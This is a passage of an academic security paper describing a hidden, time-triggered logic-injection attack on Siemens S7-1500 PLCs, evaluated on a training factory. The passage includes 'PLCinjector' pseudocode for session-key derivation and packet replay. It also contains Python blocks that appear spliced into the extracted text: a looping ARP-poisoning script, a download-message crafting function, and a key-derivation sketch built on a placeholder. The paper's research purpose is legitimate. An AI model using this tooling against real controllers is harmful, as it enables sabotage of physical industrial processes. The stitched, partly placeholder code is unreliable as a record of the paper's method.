vendor-supplied engineering software SoMachine-Basic. Senthivel et al. [18] presented three control logic injection attacks where an at- tacker interferes with engineering operations of downloading and uploading PLC control logic. In the rst attack scenario, an attacker, placed in a man-in-the-middle position between a target PLC and its engineering software, injects malicious control logic to the PLC and replaces it with original control logic to deceive the engineering software when the uploading operation is requested. The second scenario that their paper presented is very similar to the rst scenario but differs in that an attacker uploads malformed control logic instead of the original control logic to crash the engineering software. The last scenario does not require a man-in-the-middle position, as the attack just injects crafted malformed control logic to the target PLC. Lei et al. [31] demonstrated a spear that can break the security wall of the S7CommPlus protocol that Siemens SIMATIC S7-1200 PLCs utilize. The authors rst used the Wireshark software to analyze the communications between the TIA Portal software and S7 PLCs. Then, they applied the reverse debugging software WinDbg4to break the encryption mechanism of the S7CommPlus protocol. Afterwards, they demonstrated two attacks. First a replay attack was performed to start and stop the PLC remotely. 
In the second attack sce- nario, the authors manipulated the input and output values of the victim causing a serious damage for the physical process controlled by the infected PLC. In 2021, researchers in [3] also showed that S7-300 PLCs are vulnerable to such attacks and demonstrated that exploiting the control logic running in a PLC is feasible. After they compromised the security mea- sures of PLCs, they conducted a successful injection attack and kept their attack hidden from the engineering software by engaging a fake PLC impersonating the real infected de- vice. Researches behind Rogue7 [30] were able to create a rogue engineering station which can masquerade as the TIA Portal to S7 PLCs, and to inject any messages favorable to the attacker. By understanding how cryptographic messages were exchanged, they managed to hide the code in the user memory, which is invisible to the TIA Portal engineering 4http://www.windbg.org/ FIG. 3. Disrupting the physical process of ine. station. In [44], a group of security researchers analyzed the anti-replay mechanism that the new S7 PLCs used, and man- aged successfully to steal an existing communication session and to make unauthorized changes to the PLC states. As a part of their experiments, they identi ed speci c bytes necessary to craft valid network packets, and demonstrated a successful replay attack on S7 PLCs. All the attacks mentioned above are limited and require that attackers are connected to the target at the point zero for the attack, which increases the possibility of being revealed by the ICS operators beforehand, or detected by security measures. B. DISRUPTING THE PHYSICAL PROCESS OFFLINE The attacks in this class are quite similar to the ones men- tioned in the prior class, but differs in that an adversary does not aim at attacking the physical process right after gaining access to the target device. Meaning that, he patches his ma- licious code once he accesses an exposed PLC, then closes any live connection with the target keeping his patch inside the PLC s memory in idle mode. Afterwards, he activates his patch and compromises the physical process at a later time he wishes even without being connected to the system network (see Fig. 3). To the best of our knowledge, only a few academic ef- forts discussing this new threat were published. Serhane et al. [47] focused on Ladder logic code vulnerabilities and bad code practices that may become the root cause of bugs and subsequently be exploited by attackers. They showed that attackers could generate uncertainly uctuating output vari- ables e.g., performing two timers to control the same output values could lead to a race condition. Such a scenario could result in a serious damage to the devices controlled, similar to Stuxnet [12]. Another scenario that the authors pointed out is that skilled adversaries could also bypass some functions, manually set certain operands to desired values, and apply empty branches or jumps. In order to achieve a stealthy modi- cation, attackers could use array instructions or user-de ned instructions, to log insert critical parameters and values. They also discussed that attackers could apply an in nite loop via jumps, and use nest timers and jumps to only trigger the attack at a certain time. We, in our former paper [10], presented a novel approach based on injecting the target PLC with a 150 VOLUME 3, 2022 FIG. 4. A typical S7 PLC Architecture. 
Time-Of-Day interrupt code, which interrupts the execution sequence of the control logic at the time the attacker sets. Our evaluation results proved that an attacker could confuse the physical process even being disconnected from the target system. Although our research work was only tested on an old S7-300 PLC, and was just aiming at forcing the PLC to turn into stop mode, the attack was successful and managed to interrupt executing the original control logic code running in the patched PLC. Such attacks are severer than the online ones as the PLC keeps executing the original control logic correctly without being disrupted for hours, days, weeks, months and even years until the very moment determined by the attacker. The only realistic way to reveal this kind of attack is that the ICS operator requests the program from the PLC and compares the online code running in the infected device with the of ine code that he has on the engineering station. But in this work, we overcome this challenge as illustrated later in Section V. III. TECHNICAL BACKGROUND In this section, we outline the architecture of a standard S7 PLC and its operating system, engineering software, user pro- gram, Time-of-Day interrupt, and S7Communication proto- cols. A. SIMATIC S7 PLC ARCHITECTURE Siemens produces several PLC product lines in the SIMATIC S7 family e.g., S7-300, S7-400, S7-1200, and S7-1500. All have the same architecture. Fig. 4 depicts a standard archi- tecture of an S7 PLC that includes input and output modules, power supply, and memory such as Random Access Mem- ory (RAM) and Electrically Erasable Programmable Read- only Memory (EEPROM). The rmware, known as Operating System (OS), as well as the user-speci c program is stored in the EEPROM. Input and Output devices such as sensors, switches, relays, and valves are connected with the input and output modules. The PLC is connected to a physical process; the input devices provide the current state of the process to FIG. 5. Overview of program execution, extracted from [43]. the PLC, which the PLC processes through its control logic, and controls the physical process accordingly via the output devices. The control logic that an S7 PLC runs is programmed and compiled into a lower representation of the code i.e., to MC7 or MC7+ bytecode for S7-300/S7-400 or S7-1200/S7- 1500 PLCs respectively. After the code being compiled by the engi- neering station, its blocks, in MC7/MC7+ format, are down- loaded and installed into the PLC via Siemens S7Comm or s7CommPlus protocol for S7-300/S7-400 or S7-1200/S71500 PLCs respectively. Then, the MC7/MC7+ virtual machine in the S7 PLC will dispatch the code blocks, interpret and exe- cute the bytecode. B. OPERATING SYSTEM (OS) Siemens PLCs run a real time OS, which initiates the cycle time monitoring. Afterwards, the OS cycles through four steps as shown in Fig. 5. In the rst step, the CPU copies the values of the process image of outputs to the output modules. In the second step, the CPU reads the status of the input modules and updates the process image of input values. In the third step, the user program is executed in time slices with a duration of 1 ms (ms). Each time slice is divided into three parts, which are executed sequentially: The operating system, the user program and the communication. The number of time slices depends on the complexity of the current user program and the events interrupting the execution of the program. 
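The cyclic execution model described above can be mirrored by a small, purely illustrative simulation; it is not Siemens firmware code, the I/O functions are stubs, and the watchdog threshold simply reflects the default maximum cycle time discussed in the following paragraphs.

```python
# Illustrative simulation of the S7 scan cycle (not Siemens firmware):
# 1) write the process image of outputs, 2) read inputs, 3) run the user program,
# with a watchdog standing in for the CPU's cycle-time monitoring.
import time

MAX_CYCLE_TIME_S = 0.150            # default maximum cycle time (configurable on the CPU)

def write_outputs(outputs):         # step 1: copy process image of outputs to the modules
    pass

def read_inputs():                  # step 2: refresh the process image of inputs
    return {"I0.0": False}

def user_program(inputs, outputs):  # step 3: OB1 (plus any interrupt OBs)
    outputs["Q2.0"] = inputs["I0.0"]

def scan_loop():
    outputs = {"Q2.0": False}
    while True:
        start = time.monotonic()
        write_outputs(outputs)
        inputs = read_inputs()
        user_program(inputs, outputs)
        if time.monotonic() - start > MAX_CYCLE_TIME_S:
            # On a real CPU this is the situation handled by OB80 (or a CPU stop).
            raise RuntimeError("maximum cycle time exceeded")
```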
In normal operation, if an event occurs, the block currently being executed is interrupted at a command boundary and a different organization block that is assigned to the particular event is called. Once the new organization block has been executed, the cyclic program resumes at the point at which it was interrupted. This holds true as the maximum allowed cycle time (150 ms by default) is not exceeded. In other words, if there are too many interrupt OBs called in the main OB1, the entire cycle time might be extended more than it is set in the PLC hardware con guration. Exceeding the maximum allowed execution cycle generates a software error, and the PLC calls a speci c block to handle this error i.e., OB80. VOLUME 3, 2022 151 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE FIG. 6. S7 PLC s user program blocks. There are two ways to handle with this error: 1) PLC turns to a stop mode if the OB80 is not loaded in the main program, 2) PLC executes the instructions that OB80 is programmed with e.g., an alarm. C. ENGINEERING SOFTWARE Siemens provides their Total Integrated Automation (TIA) Portal software to engineers for developing PLC programs. It consists of two main components. The STEP 7 as develop- ment environment for PLCs and WinCC to con gure Human Machine Interfaces (HMIs). Engineers are able to program PLCs in one of the following programming languages: Ladder Diagram (LAD), Function Block Diagrams (FBD), Structured Control Language (SCL), and Statement List (STL). D. USER PROGRAM S7 PLC programs are divided into the following units: Or- ganization Blocks (OBs), Functions (FCs), Function Blocks (FBs), Data Blocks (DBs), System Functions (SFCs), System Function Blocks (SFBs) and System Data Blocks (SDBs) as shown in Fig. 6. OBs, FCs and FBs contain the actual code, while DBs pro- vide storage for data structures, and SDBs for the current PLC con gurations. The pre x M, memory, is used for addressing the internal data storage. A simple PLC program consists of at least one organization block called OB1, which is comparable to the main () function in a traditional C program. In more complex programs, engineers can encapsulate code by using functions and function blocks. The only difference is an ad- ditional DB as a parameter for calling an FB. The SFCs and SFBs are built into the PLC. However, the operating system calls OB cyclically and with this call it starts cyclic execution of the user program. E. TIME-OF-DAY (TOD) INTERRUPTS ATime-of-Day (TOD) interrupt is executed at a con gured time, either one-time or periodically depending on the needs of interrupt e.g., every minute, hourly, daily, monthly, yearly, and at the end of the month. A CPU 1500 provides 20 organi- zation blocks with the numbers OB10 to 0B17 and after OB 123 for processing a TOD interrupt. To start a TOD interrupt, a user must rst set the start time and then activate the interrupt. He can carry out both activitiesseparately in the block properties, automatic con guration, or also with system functions, manual con guration. Activating the block properties means that the Time-of-Day interrupt is automatically started. However, in the following we illustrate both ways brie y: 1)Automatic con guration: The user adds an organization block with the event class Time-of-Day and enters the name, programming language, and number. He programs the OB10 with the required instructions to be executed when the inter- rupt occurs. 
2)Manual con guration: In this method, the user uses sys- tem function blocks to set, cancel, and activate a Time-of-Day interrupt. He sets the necessary parameters for the interrupt in the main OB1, by using system function blocks while the interrupt instructions to be executed are programmed in OB10. [49] provides technical details to set and program Time-of-Day interrupts in S7-1500 PLCs. F. S7COMMUNICATION PROTOCOLS The S7 protocol de nes an appropriate format for exchanging S7 messages between devices. Its main communication mode follows a client-server pattern: the HMI or TIA Portal device (client) initiates transactions and the PLC (server) responds by supplying the requested data to the client, or by taking the action requested in the instruction. Siemens provides its PLCs with two different protocol avors: the older SIMATIC S7 PLCs implement an S7 avor that is identi ed by the protocol number 0x32 (S7comm), while the new generation PLCs im- plement an S7 avor that is identi ed by the protocol number 0x72 (S7CommPlus). The newer S7CommPlus protocol has three sub-versions: S7CommPlusV1, S7CommPlusV2, and S7CommPlusV3. In this article, we only focus on the S7CommPlusV3 Pro- tocol that is used in the newer versions of the TIA Portal from V13 on, and in the newer PLC S7-1500 rmware e.g., V1.8, 2.0, etc. This protocol requires that both the TIA Por- tal and the PLC support its features, and has more complex integrity protection mechanisms as illustrated in the next sec- tion. S7CommPlusV3 protocol is considered as the most se- cure protocol compared to the older S7CommPlus versions, i.e., S7CommPlusV1 and S7CommPlusV2. IV. S7COMMPLUSV3 PROTOCOL The S7CommPlusV3 protocol is used only by the newer ver- sion of the TIA Portal, and the S7-1500 PLCs. It supports var- ious operations that are performed by the TIA Portal software as follows: 1) Start/Stop the control program currently loaded in the PLC memory. 2) Download a control program to the PLC. 3) Upload the current control program from the PLC to the TIA Portal. 4) Read the value of a control variable. 5) Modify the value of a control variable. The above-mentioned operations are translated by the TIA Portal software to S7CommPlus messages before they are 152 VOLUME 3, 2022 FIG. 7. The S7 Session Key Establishment Mechanism. transmitted to the PLC. The PLC acts then on the messages it receives, executes the control operations, and responds back to the TIA Portal accordingly. The messages are transmitted in the context of a session, each session has a session ID chosen by the PLC. A session begins with a four-message handshake used to select the cryptographic attributes of the session in- cluding the protocol version and keys. After the handshake, all messages are integrity protected using a cryptographic protection mechanism as illustrated in the next subsection. A. THE S7 INTEGRITY PROTECTION MECHANISM Siemens integrated cryptographic protection in its newer S7 proprietary protocol in order to protect its PLCs from unau- thorized access. The new mechanism uses two main modules: 1)A session key exchange protocol that the two parties (PLC and TIA Portal) use to establish a secret shared key in each session. 2)Per-fragment message protection that calculates a Message Authentication Code (MAC) value. 1) S7 KEY EXCHANGE PROTECTION Siemens improved its S7CommPlus protocol by replacing the key generation process in the prior version, i.e., the S7CommPlusV2, by a more complex process in the newer version S7CommPlusV3. 
The new mechanism involves a new key exchange technique, that uses elliptic-curve public-key cryptography [33] as depicted in Fig. 7. FIG. 8. The Structure of the SecurityKeyEncriptedKey BLOB Data. The rst request message is a Hello message that the TIA Portal sends to initialize a new session. Then, the PLC re- sponds back with sharing its rmware version, model, Session ID, and speci c 20-bytes known as PLC_Challenge . The PLC rmware version determines the elliptic-curve public-key pair to be used in the key exchange. After the TIA Portal receives the second message from the PLC, it activates a derivation algorithm to randomly select a key Derivation Key (KDK ), and to generate the session key from the PLC_Challenge and the selected KDK . Afterwards, the TIA Portal transmits the key encrypted using Elliptic-Curve Cryptography (ECC) to the PLC over the third message. The third message contains, among other things, two main parts: a) A data structure called SecurityKeyEncryptedKey shown in Fig. 8, which contains the selected key encrypted with the PLC s public key. b) Two 8-bytes key ngerprints (additional key), of the PLC public key ID and the selected key, respectively. Finally, the PLC veri es the third message. If this is done successfully, it returns OK in the fourth message, and from this point on, all the following messages in the session are integrity protected with the derived Session Key. 2) PER-FRAGMENTATION MESSAGE PROTECTION When the TIA Portal downloads/uploads the control logic program to/from an S7-1500 PLC, the assigned S7CommPlus messages are fragmented to many small fragments sent over the TCP/IP packets. All messages exchanged between the two parties are integrity protected HMAC-SHA256 [27]. This integrity protection is applied at the fragment level. Meaning that, it replaces the signal MAC value at the end of each message, and a cryptographic digest is placed at each frag- ment between the fragment header and the fragment data as shown in Fig. 9. [27] presents more technical details about this protection mechanism. Although fragmenting the S7 messages was more chal- lenging for attackers, they eventually overcame this protec- tion mechanism and compromised the PLCs using this tech- nique. The vulnerability reported in [28] shows that attackers VOLUME 3, 2022 153 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE FIG. 9. S7CommPlus message with integrity protection at fragment level. could implement man-in-the-middle approach and managed successfully to modify the network traf c exchanged on port 102/TCP due to the certain properties in the calculation used for this integrity protection. B. S7COMMPLUS DOWNLOAD MESSAGES - OBJECTS AND ATTRIBUTES S7 is a request response protocol. Each request message con- sists of a request header, and a request set. The header con- tains a function code, which identi es the requested operation e.g., 0x31 for a download message (see Fig. 9). A single S7CommPlus message might contain multiple objects, each containing multiple attributes. All objects and attributes have unique class identi ers. However, the CreateObject request builds a new object in the PLC memory with a unique ID (in our example, 0x04ca ). The program download message then creates an object of the class ProgramCycleOB . This object contains multiple attributes, each one having values dedicated to a speci c purpose. 
For instance, the FunctionalObject.Code contains the binary executable code that the PLC runs i.e., the compiled program in the PLC s machine language (MC7+). The Block.AdditionalMac is used as an additional MAC value in the integrity process, and both Block.OptimizedInfo and Block.BodyDescription are equivalent to the program written by the ICS operator which are stored in the PLC and can be later uploaded, upon request, to a TIA Portal project. From the security point of view, these attributes are critical data that is transmitted over the S7CommPlusV3 protocol. Meaning that, if an attacker can intercept the S7 packets con- taining these attributes, and manage successfully to modifythem independently, he is able to cause a source-binary in- consistency as explained in detail in the next section. V. ATTACK DESCRIPTION As in any typical injection attack, we patch our malicious code, Time-of-Day interrupt block OB10, in the original con- trol logic of the target PLC. The CPU checks whether the condition of the interrupt is met in each single execution cycle. Meaning that, the attacker s interrupt block will be always checked but only executed if the date and time of the CPU s clock match the date and time set by the attacker. Hence, we have two cases: 1) The date of CPU s clock matches the date set in the OB10 (the date of the attack). The CPU immediately halts executing OB1, stores the breaking point s location in a dedicated register, and jumps to execute the content of the corresponding interrupt block OB10. 2) The date of the CPU s clock does not match the date set in OB10. The CPU resumes to execute OB1 af- ter checking the interrupt condition without activating the interrupt and without executing the instructions in OB10. Our attack approach presented in this paper is comprised of two main phases: the patching phase (online phase), and the attack phase (of ine phase). Please note that, getting the IP address, MAC address, and model of the victim PLC is an easy task by running our PN-DCP protocol based scanner presented in [5] or other network scanners that can obtain all the information that the attacker needs to communicate with the target device. 154 VOLUME 3, 2022 FIG. 10. High-level overview of the patching phase. A. PATCHING PHASE Fig. 10 shows a high-level overview of this phase. We aim at injecting the PLC with our malicious instructions pro- grammed in the interrupt block OB10. This phase consists of four steps: a) Uploading and downloading the user s program. b) Modifying and updating the control logic program. c) Crafting the S7CommPlus download message. d) Pushing the attacker s message to the victim PLC. To patch the target PLC, we utilize our MITM station which has two main components: 1)AT I AP o r t a l : to retrieve and modify the current control logic program that the PLC runs. 2)A PLCinjector: to download the attacker s code to the PLC. In this work, we developed a python script based on the Scapy5library for this purpose. For a realistic scenario, there are two possible cases that an attacker might encounter after accessing the network. 1) CASE_1: INACTIVE S7 SESSION In this scenario, the legitimate TIA Portal is of ine, and only communicates with the PLC if an upload process is required. Step 1. Uploading & Downloading the User s Program: In this step, we aim at obtaining the decompiled control logic program that the PLC runs, and the S7CommPlus message that the TIA Portal sends to download the original user pro- gram into the PLC. 
For achieving these goals, we open rst the attacker s TIA Portal and establish a connection with the victim PLC directly. This is possible due to a security gap in 5https://scapy.net/the S7-1500 PLC design. In fact, the PLC does not introduce any security check to ensure that the currently communicating TIA Portal is the same TIA Portal that it communicated with in an earlier session. For this, any external adversary provided with a TIA Portal on his machine can easily communicate with an S7 PLC without any effort. After successfully establishing the communication, we up- load the control logic program on the attacker s TIA Portal. Then we re-download it once again to the PLC and sniff the entire S7CommPlus messages ow exchanged between the attacker s TIA Portal and the victim PLC using the Wireshark software. At the end of this step, the attacker has the program on his TIA Portal, and all the captured download messages saved in a Pcap le for a future use (explained in step 3). Step 2. Modifying & Updating the PLC s Program: After retrieving the user program that the target PLC runs, the at- tacker s TIA Portal displays it in one of the high-level pro- gramming languages that it was programmed with (e.g., SCL). Based on our understanding to the physical process controlled by the PLC, we con gure and program our Time-of-Day interrupt block OB10 to force certain outputs of the system to switch off once the interrupt is being activated (shown later in Fig. 13). Although our malicious code differs from the original code with only an extra small size block (OB10), it is suf cient to confuse the physical process of our experimental set-up. The easiest way to update the program running in the PLC is to use the attacker s TIA Portal. When we downloaded the modi ed control logic, the PLC updated its program success- fully. But, the ICS operator could easily reveal the modi ca- tion by uploading the program from the infected PLC, and VOLUME 3, 2022 155 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE FIG. 11. Closing the online session using MITM Approach. FIG. 12. Experimental Set-up. comparing the of ine and online programs running on his legitimate TIA Portal and the remote PLC respectively. Step 3. Crafting the S7CommPlus Download Message: To hide our infection from the legitimate user, we rst recorded the S7CommPlus messages exchanged between the attacker s TIA Portal and the PLC while downloading the modi ed pro- gram. As mentioned earlier in Section IV.B, each download message has objects and attributes see Fig. 9. The Program- CycleOB object is dedicated to create a program cycle block in the PLC s memory and has three different attributes: a)Object MAC: donated with the item value ID: Block.AdditionalMac . b)Object Code: donated with the item value ID: Function- alObject.code . c)Source Code: donated with the item value ID: Block.BodyDescription . The Object Code is the code that the PLC reads and pro- cesses, whilst the Source Code is the code that the TIA Portal FIG. 13. The malicious instructions in OB10. decompiles, reads, and displays for the user. Therefore, all what is required to show the user the original code is to modify the S7CommPlus message that the attacker sends; by replacing the Source Code attribute of the ProgramCycleOB object of the attacker s program with the Source Code attribute of the ProgramCycleOB object of the original program. 
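Schematically, the substitution performed in this step can be expressed as follows. The dictionary representation is only an illustrative stand-in for the decoded ProgramCycleOB object; parsing and re-serialising the actual S7CommPlusV3 fragments, as well as the session-key and integrity handling discussed next, are omitted.

```python
# Schematic view of Step 3: build the crafted download message from two recorded
# sessions. Real S7CommPlusV3 parsing/serialisation is omitted; the dictionaries
# are an illustrative stand-in for the decoded ProgramCycleOB attributes.
def craft_download_object(attacker_obj: dict, original_obj: dict) -> dict:
    """attacker_obj / original_obj: ProgramCycleOB attributes captured per session."""
    return {
        # Must come from the *same* (attacker) session, or the PLC rejects the update:
        "Block.AdditionalMac":   attacker_obj["Block.AdditionalMac"],
        "FunctionalObject.Code": attacker_obj["FunctionalObject.Code"],
        # May come from a different, pre-recorded session; this is what the TIA Portal
        # later decompiles and shows to the operator:
        "Block.BodyDescription": original_obj["Block.BodyDescription"],
    }
```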
Our investigation showed that the newest model of the SIMATIC PLCs has a serious design vulnerability. The PLC checks the session freshness by running a precaution measure. Hence, it can detect any manipulation and refuses to update its program in case the attributes do not belong to the same session. But surprisingly, this holds true only for the Object MAC and the Object Code attributes. Meaning that, to make the PLC ac- cept the crafted message, our crafted S7CommPlus download message must always have the Object MAC and the Object Code attributes from the same session, whilst the Source Code attribute could be substituted with another attribute from a different session i.e., from a pre-recorded session. All the captured packets containing the attributes of the ProgramCy- cleOB for both the user and attacker programs are presented in the Appendix. Step 4. Pushing the crafted message to the PLC: The crafted S7CommPlus download message contains the following at- tributes: the Object MAC and Object Code attributes of the attacker s program, and the Source Code attribute of the user program. As S7CommPlusV3 exchanges a shared session key between the TIA Portal and the PLC to prevent performing replay attacks, we rst need to bundle the packet with a correct key before we push the crafted message to the PLC. However, exploiting the shared key is out of the scoop of this paper, but it is explained in details in [30]. Once the malicious key exchange is completed, we can easily bundle the key byte- codes with our crafted message. Taking into consideration the appropriate modi cation to the session ID and the integrity elds, we store the nal S7 message (the attacker s message) in a pcap le for pushing it back to the PLC as a replay attack. Algorithm 1 describes the main core of our PLCinjector tool that we use to patch the PLC with the attacker s download message. 156 VOLUME 3, 2022 The PLCinjector tool has two functions. The rst one is utilized to exploit the integrity protection session key that S7CommPLusV3 uses. The session key exchanged in each session between the TIA Portal and S7-1500 PLCs originates from combining 16 bytes of the PLC s ServerSessionChal- lange , precisely the ones located between the bytes 2 and 18, with a random 24-byte KDK that the TIA Portal chooses. Afterwards, a ngerprinting function f( )is used within the sessionKey calculation. Line 5 generates a 24 bytes random quantity ( M), and maps it to the elliptic curve s domain do- nated as PreKey . From the random point PreKey ,w eu s ea Key Derivation Function (KDF) to derive 3-16 bytes quantities identi ed as follows: Key Encryption Key (KEK), Checksum Seed (CS) and Checksum Encryption Key (CEK) . In line 7, theCSgenerates 4096 pseudo-random bytes organized as four 256-word, namely LUT.T h i s LUT is used to calculate a checksum over the KDK andPLC_Challenge . Lines from 8 to 13 depict the elliptic curve key exchange method similar to the one that the TIA Portal uses to encrypt the random generated PreKey . After that, we mask the elliptic curve cal- culations with 20 bytes chosen randomly (donated to xin the algorithm). Line 19 provides an authenticated encryption for the encrypted KDK . Here a non-cryptographic checksum is computed, then encrypted by AES-ECP function. Finally, we add 2 header elds including key ngerprints i.e., 8-byte trun- cated SHA256 hashes of the relevant key with some additional ags see line 20. 
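As a condensed companion to Function 1 (the full listing follows as Algorithm 1), the sketch below shows only the core derivation in Python. It is heavily simplified: the elliptic-curve encryption of the KDK, the LUT-based checksum and the key fingerprints are left out, f() is replaced by a placeholder transform, and using the KDK as the HMAC key is an assumption consistent with Fig. 7 rather than something stated by the protocol documentation.

```python
# Condensed, simplified sketch of the session-key derivation in Function 1:
# ECC encryption of the KDK, the LUT checksum and key fingerprints are omitted.
import hmac
import os
from hashlib import sha256

def f(challenge: bytes, rounds: int = 8) -> bytes:
    """Placeholder for the protocol's fingerprinting transform (assumption)."""
    digest = challenge
    for _ in range(rounds):
        digest = sha256(digest).digest()
    return digest

def derive_session_key(server_session_challenge: bytes) -> bytes:
    plc_challenge = server_session_challenge[2:18]   # 16 challenge bytes (bytes 2..18)
    kdk = os.urandom(24)                             # random 24-byte Key Derivation Key
    # Assumption: the KDK keys the HMAC over the fingerprinted challenge (cf. Fig. 7).
    return hmac.new(kdk, f(plc_challenge, 8), sha256).digest()[:24]
```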
After establishing a successful session with the victim, the PLC exchanges the malicious generated Session_Key with the attacker machine along the current communicating session. In the next step, our tool executes function 2 to send the attacker s crafted S7 message that contains both the malicious code combined with the generated Session_Key . Our attacking tool can be also used against all the S7-1500 PLCs sharing the same rmware. This is due to the fact that Siemens has designed its new S7 key exchange mechanism assuming that all devices running the same rmware version use also the same public-private key pair mechanism [30]. After a successful injection, the PLC updates its program, processing the Object Code of the attacker s program while it saves the Source Code of the user s program in its mem- ory. Therefore, whenever the user uploads the program from the infected PLC, the TIA Portal will recall, decompile, and display the original program. This kept our injection hidden inside the PLC and the user could not detect any difference between the online and of ine programs. 2) CASE_2: ACTIVE S7 SESSION In this scenario, there is an ongoing active S7 session between the legitimate TIA Portal and the PLC during the patch. As the S7 PLC, by default, allows only one active online session, an attacker is not able to communicate with the PLC. It will immediately refuse any attempt to establish a connection as it is already communicating with the user. For such a scenario, the attacker needs rst to close the current online sessionAlgorithm 1: PLCinjector Tool. Function 1 Get_Session_Key (( ServerSessionChallenge )) 1: Checksum =0 2: PLC_Challenge =ServerSessionChallenge [2:18] 3: KDK=prng (24) 4: Session_Key =HMAC-SHA256 ( f(Challenge ,8)) [:24] 5: PreKey =M(prng(24)) 6: KEK,CEK,CS =KDF (PreKey) 7: LUT[4][256] =hash-init (CS) 8: while point== do 9: x=prng(20) 10: point=fx(G, y, Nonce) 11: EG2=y(point) 12: end while 13: EG1=add(s,PreKey ) 14: forblock in E( KDK )do 15: Checksum =hash (checksum) block, LUT[4][256] 16: end for 17: Checksum[12] =Checksum[12] 40 18: nal_Checksum =hash (Checksum, LUT[4][256] ) 19: key =AES-ECB ( nal_Checksum) 20: KEY =SHA256(key[:24] || DERIVE [:8]) 21: Return KEY END Function 1 Function 2 Replay (pcap le, Ethernet_interface, SrcIP, SrcPort) 22: RecvSeqNum =0 23: SYN =TRUE 24: forpkt in rdpcap (Pcap le) do 25: IP =packet [IP] 26: TCP =packet[TCP] 27: delete IP.checksum 28: IP.src =SrcIP 29: IP.Port =SrcPort 30: ifTCP. ags ==Ack or TCP. ags == RSTACK then 31: TCP.ack =RecvSeqNum+1 32: ifsendp(packet, iface=Ethernet_interface) then 33: SYN =False 34: Continue 35: end if 36: end if 37: Recv =Srp1(packet, iface =Ethernet_interface) 38: RecvSeqNum =rcv[TCP].seq 39: end for END Function 2 between the legitimate user and the PLC, before patching his malicious code. A user can establish an online session with an S7 PLC by enabling the go online feature in the TIA Portal software. Then he can control, monitor, diagnose, download, upload, VOLUME 3, 2022 157 ALSABBAGH AND LANGEND ERFER: NEW INJECTION THREAT ON S7-1500 PLCS - DISRUPTING THE PHYSICAL PROCESS OFFLINE start, and stop the CPU remotely. Once the user has estab- lished an online connection with the PLC, the two parties (the TIA Portal and PLC) start exchanging a speci c mes- sage along the session regularly. This message is known as S7-ACK , and in charge of keeping the session alive. The TIA Portal must always respond to any S7-ACK request sent by the PLC with a S7-ACK replay message. 
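Breaking that keep-alive exchange is what forces both sides offline. A minimal Scapy sketch of the ARP-poisoning step used to get into a position where the Portal's S7-ACK replies can be intercepted and dropped is shown below; all addresses and the interface are placeholders, and the complete MITM station is the one presented in [3].

```python
# Minimal ARP-poisoning sketch: tells the PLC that the attacker's MAC owns the
# TIA Portal's IP (and vice versa) so that S7-ACK replies can be intercepted/dropped.
# All addresses and the interface are placeholders, for illustration only.
import time
from scapy.all import ARP, Ether, sendp

IFACE        = "eth0"
ATTACKER_MAC = "aa:bb:cc:dd:ee:ff"
PLC_IP,  PLC_MAC = "192.168.0.1",  "00:1b:1b:00:00:01"
TIA_IP,  TIA_MAC = "192.168.0.10", "00:0c:29:00:00:02"

def poison_once():
    # op=2 -> gratuitous ARP reply ("is-at"); psrc is the address being impersonated.
    to_plc = Ether(dst=PLC_MAC) / ARP(op=2, psrc=TIA_IP, hwsrc=ATTACKER_MAC,
                                      pdst=PLC_IP, hwdst=PLC_MAC)
    to_tia = Ether(dst=TIA_MAC) / ARP(op=2, psrc=PLC_IP, hwsrc=ATTACKER_MAC,
                                      pdst=TIA_IP, hwdst=TIA_MAC)
    sendp([to_plc, to_tia], iface=IFACE, verbose=False)

while True:              # keep the ARP caches poisoned until the session is torn down
    poison_once()
    time.sleep(2)
```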
Therefore, for closing the current online session we run our MITM station (presented in [3]) that allows us to intercept and drop all packets sent from the TIA Portal, by performing the well-known ARP poisoning approach. If the PLC does not receive a response from the TIA Portal right after sending an acknowledgment request, it will close the connection with the connected TIA Portal and both go of ine. Fig. 11 describes this scenario. It is worth mentioning that, an attacker can also use dif- ferent ways to close the connection e.g., port stealing, replay attack with go of ine packets, etc. After both the legitimate TIA Portal and the victim PLC turned of ine, the attacker can easily establish a new session with the PLC, using his own TIA Portal. Then he patches the victim device following the same four steps explained in the previous case. For this scenario, our patching approach has limitations. The legitimate TIA Portal was forced to close the session with the PLC. Meaning that, the user can see obviously that he lost the connection with the remote device. In case he attempts to re-connect to the PLC while it is connected to the attacker s TIA Portal, the PLC will refuse his connection request. Our investigations showed that there is no way to re-connect the legitimate TIA Portal to the victim PLC after patching the PLC, unless the ICS operator himself enables go online on his TIA Portal. This abnormal disconnection between the two parties is the only effect of our patch in this scenario. B. ATTACK PHASE After a successful injection, the attacker goes of ine and closes the current communication session with the target PLC. With the next execution cycle, the attacker s program will be executed in the PLC. Meaning that, the interrupt condition of the malicious interrupt block OB10 will be checked in each execution cycle. This block remains in idle mode, and hidden in the PLC s memory as long as the interrupt condition is not met. Once the con gured date and time of the attack matches the date and time of the CPU, the interrupt code will be acti- vated i.e., the execution process of the main program (OB1) is suspended, and the CPU jumps to execute all the instructions that the attacker programmed OB10 with. In our application example, we programmed the OB10 to force certain motors to turn off at a certain time and date when we are completely disconnected from the target s network. VI. EVALUATION, DISCUSSION, AND MITIGATION In this section, we present the implementation of our attack approach, and assess the service disruption of the physical process due to our patch. Afterwards, we discuss our results and suggest possible mitigation methods to protect systems from such a threat.A. LAB SETUP For evaluating our attack approach, we used the Fischertech- nik training factory shown in Fig. 12. It consists of industrial modules such as storage and retrieval stations, vacuum suction grippers, high-bay warehouse, multi-processing station with kiln, a sorting section with color detection, an environment sensor and a pivoting camera. The entire factory is controlled by a SIMATIC S7-1512SP with a rmware V2.9.2, and pro- grammed by TIA Portal V16. The PLC connects to a TXT controller via an IoT gateway. The TXT controller serves as a Message Queuing Telemetry Transport (MQTT) broker and an interface to the schertechnik cloud. The factory we used in our experiment provides two in- dustrial processes. Storing and ordering materials. 
